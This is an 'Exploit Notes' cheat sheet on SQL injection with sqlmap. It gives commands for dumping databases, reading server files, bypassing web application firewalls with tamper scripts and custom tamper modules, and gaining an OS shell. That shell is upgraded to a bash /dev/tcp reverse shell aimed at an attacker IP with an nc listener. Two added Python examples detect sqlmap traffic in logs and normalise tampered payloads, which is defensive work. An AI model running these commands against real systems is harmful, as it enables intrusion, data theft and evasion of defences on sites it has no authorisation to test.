Exploit Notes

SQL Injection with Sqlmap

Last modified: 2023-02-10

Tags: Database, Reverse Shell, SQL Injection, Web

SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This page shows how to find and exploit SQL injection with sqlmap.

Basic Commands

# GET request
sqlmap -u "http://<target-ip>/?search=test"
# -p: target parameter
sqlmap -u "http://<target-ip>/?category=test&item=1" -p item

# Header param injection
sqlmap -u "https://example.com/?search=test" --headers "X-Forwarded-For: 1*"

# POST request
sqlmap -u "http://<target-ip>" --data="username=test&password=test"

Using Request File

We can pass a raw HTTP request saved from Burp Suite with the "-r" flag.
sqlmap reads the target URL, method, headers and body from that file.

sqlmap -r request.txt
sqlmap -r request.txt --dump --dbs --tables --columns --random-agent
sqlmap -r request.txt --dump --dbms mysql --risk 3 --level 5

# --fresh-queries: new data in tables
sqlmap -r request.txt --fresh-queries

# --current-user: Retrieve current user
sqlmap -r request.txt --current-user
# --current-db: Retrieve current DB
sqlmap -r request.txt --current-db

# Specify database name, table name, column name
sqlmap -r request.txt -D database_name -T table_name -C column_name
# Specify multiple columns
sqlmap -r request.txt -D database_name -T table_name -C username,password

# --technique U: Union attack
# --delay 2: Time delay
sqlmap -r request.txt --technique U --delay 2
# --technique T: Time-based Blind SQLi
sqlmap -r request.txt --technique T

# --time-sec: Sleep time for Time-Based Blind SQLi
sqlmap -r request.txt --time-sec 2

# --ignore-code: Ignore specific response
sqlmap -r request.txt --ignore-code 401

# --dump-all: Dump all database table entries
sqlmap -r request.txt --dump-all

Web Shell

Add the "--os-shell" option to get an interactive OS shell through the injection.

sqlmap -u "http://<target-ip>" --cookie="value=*" --os-shell

The os-shell is not a fully interactive shell, so once it is up you may want to upgrade it to a proper one.
You can do that by spawning a reverse shell.

In your local machine,

nc -lvnp 4444

Then execute the following command in web shell.

os-shell> bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'

Read Files

# --batch: never ask for user input, use the default behavior
sqlmap -r request.txt --file-read "/var/www/html/index.php" --time-sec 10 --batch
sqlmap -r request.txt --file-read "/var/www/<subdomain>/index.php" --time-sec 10 --batch

sqlmap -u "http://<target-ip>/?q=test" --file-read "/var/www/html/index.php" --time-sec 10 --batch
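Seen from the defending side, the options above each leave a recognisable trace in web server logs. The following is an added example, not from the original page, that scans constructed Apache-style access-log lines for sqlmap's default User-Agent, UNION payloads (--technique U), time-based payloads (--technique T) and LOAD_FILE/INTO OUTFILE (--file-read, --os-shell), then reports clients with several flagged requests; the log lines and the threshold are made up for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format) for this example; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2023:10:00:01 +0000] "GET /?search=test HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Feb/2023:10:00:02 +0000] "GET /?search=test%27%20AND%20SLEEP(2)--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [10/Feb/2023:10:00:03 +0000] "GET /?search=test%27%20UNION%20ALL%20SELECT%20NULL,NULL--%20- HTTP/1.1" 200 640 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.9 - - [10/Feb/2023:10:00:04 +0000] "GET /?search=test%27%20UNION%20ALL%20SELECT%20LOAD_FILE(%27/var/www/html/index.php%27)--%20- HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.7 - - [10/Feb/2023:10:00:05 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# groups: client ip, method, request target, status, user agent
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Each pattern is labelled with the sqlmap option that typically produces it.
INDICATORS = {
    "time-based (--technique T)": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I),
    "union (--technique U)": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "file access (--file-read/--os-shell)": re.compile(r"\bLOAD_FILE\s*\(|\bINTO\s+(OUT|DUMP)FILE\b", re.I),
}

def scan(log_text):
    """Return one (client ip, decoded request target, indicator names) tuple per flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status, agent = m.groups()
        decoded = unquote_plus(target)  # payloads arrive URL-encoded in the query string
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if agent.lower().startswith("sqlmap/"):  # sqlmap's default UA unless --random-agent is used
            hits.append("sqlmap user agent")
        if hits:
            findings.append((ip, decoded, hits))
    return findings

def noisy_clients(findings, threshold=3):
    """Clients with at least `threshold` flagged requests; sqlmap sends many probes per parameter."""
    counts = Counter(ip for ip, _, _ in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, target, hits in found:
        print(ip, target, hits)
    print("noisy clients:", noisy_clients(found))
```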


The sqlmap can be tampered by custom python script e.g. tamper.py or the default library.

WAF (Web Application Firewall) Bypass

The module names below are sqlmap's built-in tamper scripts; what each module does is explained in a separate post.

# General
sqlmap -r request.txt --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

sqlmap -r request.txt --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

sqlmap -r request.txt --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
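Each tamper module in the lists above rewrites the payload in a fixed way, so a detection rule that wants to see the original payload has to peel those layers off again. The following normaliser is an added example, not part of the page or of sqlmap itself, that heuristically reverses base64encode, charunicodeencode, percentage, charencode/chardoubleencode, space2plus, apostrophemask, apostrophenullencode, modsecurityversioned, space2comment, space2dash/space2hash and multiplespaces, and matches keywords case-insensitively to cover randomcase; the payload strings in the tests are constructed.

```python
import base64
import re
from urllib.parse import unquote_plus

def _maybe_base64(s):
    """Undo base64encode, but only if the whole payload is valid base64 that decodes to printable text."""
    if s and len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        try:
            text = base64.b64decode(s, validate=True).decode("ascii")
            if text.isprintable():
                return text
        except (ValueError, UnicodeDecodeError):
            pass
    return s

def normalize(payload):
    """Peel off the encoding layers added by the tamper modules and return a canonical payload."""
    s = _maybe_base64(payload)
    # charunicodeencode: %u0053 -> 'S'
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    # percentage: a '%' not followed by two hex digits (%S%E%L%E%C%T) is padding, not an escape
    s = re.sub(r"%(?![0-9A-Fa-f]{2})", "", s)
    # charencode / chardoubleencode / space2plus: URL-decode until the result stops changing
    for _ in range(3):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # apostrophenullencode (%00%27) and apostrophemask (fullwidth apostrophe U+FF07)
    s = s.replace("\x00", "").replace("\uff07", "'")
    # modsecurityversioned / versionedkeywords: keep the text inside /*!NNNNN ... */
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    # space2comment, space2dash, space2hash: comments that stand in for spaces
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"(?:--|#)[^\n]*\n", " ", s)
    # multiplespaces / space2randomblank: collapse any whitespace run to one space
    return re.sub(r"\s+", " ", s).strip()

# Keywords are checked case-insensitively, which also covers the randomcase module.
SQLI_RE = re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b|\bSLEEP\s*\(|\bLOAD_FILE\s*\(|\bOR\s+\d+\s*=\s*\d+", re.I)

def looks_like_sqli(payload):
    """True when the normalized payload contains a classic injection construct."""
    return bool(SQLI_RE.search(normalize(payload)))
```

The base64 step is the one most likely to misfire on ordinary input, which is why it only triggers when the whole value decodes to printable ASCII.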

Custom tamper modules (Base64 encode)

We can also write our own tamper module.
For instance, create "tamper.py":

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    # No extra dependencies, but sqlmap expects this function to exist.
    pass

def tamper(payload, **kwargs):
    # Base64-encode the whole payload before it is sent.
    payload = encodeBase64("%s" % payload, binary=False)
    return payload

Then execute sqlmap.

# The tamper is a module, so we need to create __init__.py in the current directory.
touch __init__.py
sqlmap -u "https://example.com/" --cookie "session=*" --tamper=tamper.py

Multiple Requests

import requests
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

address = "http://vulnerable.com"
password = "test"

def dependencies():
    pass

def create_account(payload):
    # Register a user whose username is the injected payload.
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        s.post(f"{address}/signup", data=data)

def login(payload):
    # Log in as that user and return the session cookie for the follow-up request.
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        s.post(f"{address}/login", data=data)
        sessid = s.cookies.get("session", None)
    return "session={}".format(sessid)

def tamper(payload, **kwargs):
    # kwargs["headers"] is the header dict sqlmap will send; setting Cookie here
    # makes the request run in the session of the freshly created account.
    headers = kwargs.get("headers", {})
    create_account(payload)
    headers["Cookie"] = login(payload)
    return payload

Then run sqlmap with the tamper option.

sqlmap --tamper tamper.py --url http://vulnerable.com/signup --data "username=admin&password=test" --second-url "http://vulnerable.com/post" --no-cast
